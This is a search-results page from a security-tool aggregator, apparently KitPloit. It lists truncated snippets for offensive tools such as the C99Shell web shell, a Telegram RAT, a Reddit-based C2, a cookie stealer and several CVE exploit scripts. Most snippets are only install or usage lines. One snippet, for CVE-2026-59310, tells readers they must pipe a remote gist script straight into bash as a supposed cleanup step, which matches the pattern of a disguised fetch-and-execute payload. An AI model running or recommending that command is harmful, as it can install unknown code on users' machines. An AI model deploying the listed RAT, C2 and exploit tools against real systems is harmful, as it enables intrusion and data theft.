195 matches found
LeakManager
LeakManager Install root@kitploit: sudo apt-get install mongodb-org screen pip3 install -r requeriments.txt Usage root@kitploit: screen -S leakManager hug -f index.py -p 1337 OR gunicorn index:hugwsgi -b 0.0.0.0:1337 OR uwsgi --http 0.0.0.0:1337 --wsgi-file index.py --callable hugwsgi ctrl + a + ...
Network-Analysis-Tools
Pcap Capture File Analysis Toolv.1 root@kitploit: !CONTACT! | Email: [email protected] | | Github: github/azizaltuntas | | Twitter: @esccopyright | Features root@kitploit: 1-Top 10 Visited Sites 2-Emails 3-All Request Urls 4-User-Agents List 5-String Grep Mode 6-Connection details 7-Ports Us...
C99Shell-PHP7
root@kitploit: . . . / / \ //| | | | | | \ \ \ / / / \ | | / | | | | \ / / / / / / \ \ \ / / / / / | Y \ /| | | | \ / / \ \ / // / / / /|| / // / /\ \ /\ / / / / / / / / / | | | \ \ / / | | / | / | | | | | \ \ /\ / /| | | || | / / | ' | | | | | / | ' \ / | | | \ / / / | || | / / | | | | | | | | |...
bissap
bissap root@kitploit: %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%. % % % .: % .===% . :: % :%%=====%%%%%%: % %%%= =====%============%%%-% = % = =====-================ % BBBBBBBBBBBBBBBBB IIIIIIIIII SSSSSSSSSSSSSSS SSSSSSSSSSSSSSS AAA PPPPPPPPPPPPPPPPP = : =====================% + B::::::::::::::::B I::::::::I...
CVE-2022-22947
CVE-2022-22947 使い方: root@kitploit: python3 CVE-2022-22947.py url...
Spartan
Spartan プロ級のリコン Wiki • 使い方 • ギャラリー 機能 Aquatone と Sublist3r を使用したサブドメインスキャン ライブサイトのみの Httprob オープンポートの Masscan CMSeeK を使用した CMS の識別 waybackMachine からの URL 取得 Aquatone を使用したスクリーンショット Dirsearch を使用したディレクトリとファイルのブルートフォース Cors スキャン 全サイトへの PUT メソッドの試行 S3 バケットのブルートフォースとスキャン Vhost スキャン サブドメイン列挙のさらなる方法...
CVE-2024-23897
CVE-2024-23897 | Jenkins -p -f または root@kitploit: python CVE-2024-23897.py -i -f パラメータ: -t または --target: ターゲットIPを指定します。単一IP、IP範囲、カンマ区切りリスト、CIDRブロックに対応しています。...
CVE-2026-59310
CVE-2026-59310 捐赠 通过 PayPal 或扫描下方二维码来支持本项目的维护。 ⚡ 简单用法 仅在安全且经授权的环境中使用本项目,例如: 本地虚拟机 Docker 容器 隔离的实验室环境 经授权的渗透测试环境 示例设置与用法: root@kitploit: Follow every dir project 注意: 从其他项目克隆时,你必须运行 curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y 以清除嵌套目录中...
CVE-2018-9995-2
工具 CVE-2018-9995-2 root@kitploit: CVE: CVE-2018-9995 利用作者: Fernandez Ezequiel @capitanalfa 修改者: Kien Quoc 版本: 2.0 安装 Python3 root@kitploit: apt-get install git pip3 install requests pip3 install colorama sudo apt update apt-get install python3 快速开始 root@kitploit: git clone...
CVE-2026-64600
CVE-2026-64600 Donar Apoya el mantenimiento de este proyecto con PayPal o escaneando el código QR a continuación. ⚡ Uso Sencillo Utilice este proyecto únicamente en entornos seguros y autorizados, como: Máquinas virtuales locales Contenedores Docker Configuraciones de laboratorio aisladas Entorno...
SharpCookieMonster
SharpCookieMonster root@kitploit: .&@. .@@. &&&@ @/ @ @ & ,& &@@@@/ &/ @ &@ @@@@@@@@ @. @. @@/ @ @@@@@@@/ @, @@ @ @@@@@@@@ && %%/%%&//... /% @@@@@@@@ @ ,@///////@. .@..@, %@@ &/////@@. .&@/////////////////&@. &%///@. &/////////////////////////%@...
w11_shadow_copies
Windows 11 卷影副本 在 Windows 11 上,内置的 vssadmin 可以列出、删除或调整卷影副本的大小,但微软移除了创建它们的功能。不过,你仍然可以通过直接与卷影复制服务(VSS)API 交互来实现,我在我的另一个工具 SAMDump 中已经使用了这个 API。 在此仓库中,你可以找到用于创建、列出或删除卷影副本的独立脚本,以及组合了这三种功能的“管理器”脚本。它们本身不应被安全解决方案视为恶意。 这些脚本使用 C、C++、Crystal 和 Python 实现,并且也应该能在其他 Windows 版本上运行。 C、C++ 和 Crystal 版本 创建卷影副本:...
RedditC2
RedditC2 Reddit APIを悪用してC2トラフィックをホストする。ブルーチームのメンバーの多くがRedditを使用しているため、トラフィックを正当に見せかける優れた方法になるかもしれません。 🚫 免責事項: このプロジェクトの使用は教育/テスト目的のみ です。許可されていないマシン での使用は固く禁じられています 。もし誰かがこれを違法/悪意のある目的 で使用した場合、リポジトリの作者は一切の責任を負いません 。 必要条件 python3でPRAW ライブラリをインストール: root@kitploit: pip3 install praw クイックスタート...
nikto
nikto Niktoウェブサーバースキャナー - https://cirt.net/Nikto2 完全なドキュメント - https://github.com/sullo/nikto/wiki 通常の実行: root@kitploit: git clone https://github.com/sullo/nikto Main script is in program/ cd nikto/program Run using the shebang interpreter ./nikto.pl -h http://www.example.com Run using perl if you...
CVE-2025-57819
使用方法 root@kitploit: python3 exploit.py 法的警告 !WARNING このソフトウェアは、教育および許可されたセキュリティ研究目的のみを対象としています。許可されていないシステムでの使用は違法であり、固く禁止されています。作者であるkali は、このフレームワークの損害または誤用について一切の責任を負いません。...
CVE-2021-26855-d
基本的な使い方:python owamails.py -u -l -p オプション引数: root@kitploit: -h, --help show this help message and exit -u URL, --url URL Url, provide schema and not final / eg https://example.org -l LIST, --list LIST Users mailbox list -p PATH, --path PATH Path to write emails in xml format -f FQDN, --fqdn FQDN...
CVE-2026-33032
CVE-2026-33032 安全检查(读取 nginx 状态) root@kitploit: python3 main.py http://target:9000 --tool nginxstatus 列出配置 root@kitploit: python3 main.py 10.0.0.50 --tool nginxconfiglist 破坏性演示(写入并重载) root@kitploit: python3 main.py http://target:9000 \ --tool nginxconfigadd \ --payload poc.conf \ --content 'serve...
TelegramRAT
TelegramRAT root@kitploit: クロスプラットフォームのTelegramベースRAT。Telegram経由で通信し、ネットワーク制限を回避します。 注意: root@kitploit: 新しいクロスプラットフォームRATを使用: https://github.com/machine1337/pyFUD インストール: root@kitploit: 1. git clone https://github.com/machine1337/TelegramRAT.git 2. 次に、「HOW TO USE」セクションの指示に従ってください。 デモ:...
CVE-2026-54900
CVE-2026-54900, CVE-2026-54902 捐赠 通过 PayPal 或扫描下方二维码支持本项目的维护。 ⚡ 简单用法 请仅在安全且经授权的环境中使用本项目,例如: 本地虚拟机 Docker 容器 隔离的实验环境 经授权的渗透测试环境 示例设置: root@kitploit: git clone cd Project use python follow below Create a virtual environment python -m venv venv Activate the virtual environment macOS / Linux source...